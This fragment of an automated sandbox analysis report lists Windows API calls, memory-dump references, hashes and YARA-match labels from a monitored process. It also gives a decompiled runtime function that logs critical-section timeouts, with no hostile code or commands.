                                                          • Instruction ID: 7d3a1f33499741786566d97499d6d579bd1c01d8223ee995301a247f514c3bd6
                                                          • Opcode Fuzzy Hash: 924556bb0c096b962c3324a2fcb7559adc0890ece0181f16ab3a979748322075
                                                          • Instruction Fuzzy Hash: CBF0A0B5610214AFDB14DF55DC41EEB77A8EF85750F108169F90D97241CA3194018FB1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • RtlAllocateHeap.NTDLL(008E3546,?,008E3CBF,008E3CBF,?,008E3546,?,?,?,?,?,00000000,00000000,?), ref: 008E88ED
                                                          Memory Dump Source
                                                          • Source File: 00000012.00000002.514724044.00000000008D0000.00000040.00020000.sdmp, Offset: 008D0000, based on PE: false
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AllocateHeap
                                                          • String ID:
                                                          • API String ID: 1279760036-0
                                                          • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                          • Instruction ID: 12c4248496d2efa0d49578e1835bd5b2e96ddc0b6e0739bce4a9c9b2430df045
                                                          • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                          • Instruction Fuzzy Hash: B2E012B1200208ABDB14EF99CC85EA777ACFF88650F118558FE089B242C630F910CAB0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,?,008DCFD2,008DCFD2,?,00000000,?,?), ref: 008E8A90
                                                          Memory Dump Source
                                                          • Source File: 00000012.00000002.514724044.00000000008D0000.00000040.00020000.sdmp, Offset: 008D0000, based on PE: false
                                                          Yara matches
                                                          Similarity
                                                          • API ID: LookupPrivilegeValue
                                                          • String ID:
                                                          • API String ID: 3899507212-0
                                                          • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                          • Instruction ID: 95669d9ca40a811e37116e5994f846dd759dd59e3da94a23a64a2f5eab609e7f
                                                          • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                          • Instruction Fuzzy Hash: B1E01AB1200208ABDB10DF49CC85EE737ADEF89650F018154FE0857242C934E8108BF5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • SetErrorMode.KERNELBASE(00008003,?,?,008D7C93,?), ref: 008DD46B
                                                          Memory Dump Source
                                                          • Source File: 00000012.00000002.514724044.00000000008D0000.00000040.00020000.sdmp, Offset: 008D0000, based on PE: false
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ErrorMode
                                                          • String ID:
                                                          • API String ID: 2340568224-0
                                                          • Opcode ID: b859b7cae5d840821570f7fd72460b0c7ff461e09dfcff46a89307c648adf87c
                                                          • Instruction ID: 8146df77547f5cfc904ac05cadf8a4d5d0728847b815ff0abb16b870f15ae034
                                                          • Opcode Fuzzy Hash: b859b7cae5d840821570f7fd72460b0c7ff461e09dfcff46a89307c648adf87c
                                                          • Instruction Fuzzy Hash: 75D0A7717503087BE610FAA89C07F6633CDAB45B00F494064F949D73C3D960F9004165
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000012.00000002.520500167.0000000004C80000.00000040.00000001.sdmp, Offset: 04C80000, based on PE: true
                                                          • Associated: 00000012.00000002.520804726.0000000004D9B000.00000040.00000001.sdmp Download File
                                                          • Associated: 00000012.00000002.520823591.0000000004D9F000.00000040.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 46b71691a7d0934ef13d22d733885ae913be6d5d81c549b686035e754971301d
                                                          • Instruction ID: 2af99b5fec2dc05dcf0ca27f67f6432c05b3a299e9841021ce4b4492eaeedb70
                                                          • Opcode Fuzzy Hash: 46b71691a7d0934ef13d22d733885ae913be6d5d81c549b686035e754971301d
                                                          • Instruction Fuzzy Hash: 2BB09BF19014C5C5F751D7614A087277A1577D0745F27C052D2030641A477CD1D1F5B5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Non-executed Functions

                                                          C-Code - Quality: 53%
                                                          			E04D3FDDA(intOrPtr* __edx, intOrPtr _a4) {
                                                          				void* _t7;
                                                          				intOrPtr _t9;
                                                          				intOrPtr _t10;
                                                          				intOrPtr* _t12;
                                                          				intOrPtr* _t13;
                                                          				intOrPtr _t14;
                                                          				intOrPtr* _t15;
                                                          
                                                          				_t13 = __edx;
                                                          				_push(_a4);
                                                          				_t14 =  *[fs:0x18];
                                                          				_t15 = _t12;
                                                          				_t7 = E04CECE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
                                                          				_push(_t13);
                                                          				E04D35720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
                                                          				_t9 =  *_t15;
                                                          				if(_t9 == 0xffffffff) {
                                                          					_t10 = 0;
                                                          				} else {
                                                          					_t10 =  *((intOrPtr*)(_t9 + 0x14));
                                                          				}
                                                          				_push(_t10);
                                                          				_push(_t15);
                                                          				_push( *((intOrPtr*)(_t15 + 0xc)));
                                                          				_push( *((intOrPtr*)(_t14 + 0x24)));
                                                          				return E04D35720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
                                                          			}










                                                          0x04d3fdda
                                                          0x04d3fde2
                                                          0x04d3fde5
                                                          0x04d3fdec
                                                          0x04d3fdfa
                                                          0x04d3fdff
                                                          0x04d3fe0a
                                                          0x04d3fe0f
                                                          0x04d3fe17
                                                          0x04d3fe1e
                                                          0x04d3fe19
                                                          0x04d3fe19
                                                          0x04d3fe19
                                                          0x04d3fe20
                                                          0x04d3fe21
                                                          0x04d3fe22
                                                          0x04d3fe25
                                                          0x04d3fe40

                                                          APIs
                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04D3FDFA
                                                          Strings
                                                          • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 04D3FE01
                                                          • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 04D3FE2B
                                                          Memory Dump Source
                                                          • Source File: 00000012.00000002.520500167.0000000004C80000.00000040.00000001.sdmp, Offset: 04C80000, based on PE: true
                                                          • Associated: 00000012.00000002.520804726.0000000004D9B000.00000040.00000001.sdmp Download File
                                                          • Associated: 00000012.00000002.520823591.0000000004D9F000.00000040.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                          • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                          • API String ID: 885266447-3903918235
                                                          • Opcode ID: 3daa09bb9d804bcaa0d00e78eef8534773fad057c9d061f0b899b34650cc3e7e
                                                          • Instruction ID: 53efaf49bf25234e3089ede813a7b06fa20e568a5eaa50747eaafe4e6c56acb3
                                                          • Opcode Fuzzy Hash: 3daa09bb9d804bcaa0d00e78eef8534773fad057c9d061f0b899b34650cc3e7e
                                                          • Instruction Fuzzy Hash: EAF0F072640201BFEA201A45DC06F33BBABEB44771F240318F668561E1EA62FC2096F4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%